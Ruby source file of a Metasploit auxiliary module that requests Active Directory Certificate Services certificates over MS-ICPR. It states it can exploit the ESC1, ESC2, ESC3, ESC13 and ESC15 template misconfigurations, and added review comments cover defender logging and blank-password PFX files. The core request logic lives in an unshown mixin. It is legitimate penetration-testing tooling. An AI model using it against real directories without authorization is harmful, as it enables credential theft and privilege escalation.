GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/dcerpc/icpr_cert.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'ruby_smb/dcerpc/client'
# Auxiliary module that requests a certificate from Active Directory
# Certificate Services (AD CS) over MS-ICPR.
#
# The module declares a single action, REQUEST_CERT. It can run over an
# existing SMB session (see #with_ipc_tree) or without one; the request itself
# is made by `request_certificate`, which is not defined in this file
# (presumably provided by the MsIcpr mixin — confirm).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::MsIcpr
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::DCERPC
  include Msf::Auxiliary::Report
  include Msf::OptionalSession::SMB

  # Registers the module's metadata: name, description, authors, references,
  # notes and the list of supported actions.
  #
  # @param info [Hash] metadata passed in by the caller and merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ICPR Certificate Management',
        # Per the description below, saved PFX files carry a blank password.
        # The file therefore holds the private key with no effective
        # protection: anyone who can read it can use the certificate, so it
        # should be stored and cleaned up like any other plaintext credential.
        'Description' => %q{
          Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
          template's configuration the resulting certificate can be used for various operations such as authentication.
          PFX certificate files that are saved are encrypted with a blank password.

          This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Will Schroeder', # original idea/research
          'Lee Christensen', # original idea/research
          'Oliver Lyak', # certipy implementation
          'Spencer McIntyre'
        ],
        'References' => [
          [ 'URL', 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],
          [ 'URL', 'https://github.com/GhostPack/Certify' ],
          [ 'URL', 'https://github.com/ly4k/Certipy' ]
        ],
        'Notes' => {
          # Reliability and Stability are declared empty in this module.
          'Reliability' => [],
          'Stability' => [],
          # IOC_IN_LOGS: running the module leaves evidence in logs. For
          # defenders, certificate requests and issuance are typically
          # recorded on the CA as Windows Security events 4886/4887 when
          # AD CS auditing is enabled; nothing in this file controls that.
          'SideEffects' => [ IOC_IN_LOGS ],
          # NOTE(review): 'Certifry' looks like a misspelling of 'Certify'
          # (the GhostPack tool referenced above) — confirm before changing.
          'AKA' => [ 'Certifry', 'Certipy' ]
        },
        'Actions' => [
          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]
        ],
        'DefaultAction' => 'REQUEST_CERT'
      )
    )
  end

  # Entry point: dispatches to the handler for the selected action and turns
  # the mixins' error classes into the matching framework failure codes.
  #
  # @return [void]
  def run
    # The method name is built from the selected action's name. Only
    # REQUEST_CERT is declared above, which resolves to #action_request_cert.
    # NOTE(review): this relies on the framework limiting the action to the
    # declared list; otherwise an interpolated `send` would be open-ended
    # dispatch — confirm.
    handler = "action_#{action.name.downcase}"
    send(handler)
  rescue MsIcprConnectionError, SmbIpcConnectionError => error
    fail_with(Failure::Unreachable, error.message)
  rescue MsIcprAuthenticationError, MsIcprAuthorizationError, SmbIpcAuthenticationError => error
    fail_with(Failure::NoAccess, error.message)
  rescue MsIcprNotFoundError => error
    fail_with(Failure::NotFound, error.message)
  rescue MsIcprUnexpectedReplyError => error
    fail_with(Failure::UnexpectedReply, error.message)
  rescue MsIcprUnknownError => error
    fail_with(Failure::Unknown, error.message)
  end

  # Handler for the REQUEST_CERT action: requests a certificate, passing along
  # the IPC tree options when an SMB session is in use.
  def action_request_cert
    with_ipc_tree { |ipc_opts| request_certificate(ipc_opts) }
  end

  # Yields the options for the certificate request and disconnects the IPC$
  # tree afterwards if one was opened here.
  #
  # @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.
  # @return [void]
  def with_ipc_tree
    ipc_opts = {}
    if session
      print_status("Using existing session #{session.sid}")
      # Reuse the session's SMB client rather than opening a new connection.
      self.simple = session.simple_client
      smb_client = simple.client
      ipc_share = "\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$"
      ipc_opts[:tree] = smb_client.tree_connect(ipc_share)
    end

    yield ipc_opts
  ensure
    # Runs on success and on error, so the tree is released either way.
    # NOTE(review): if disconnect! itself raises, that error would replace the
    # one raised inside the block and may bypass the rescue chain in #run —
    # confirm whether that can happen.
    tree = ipc_opts[:tree]
    tree.disconnect! if tree
  end
end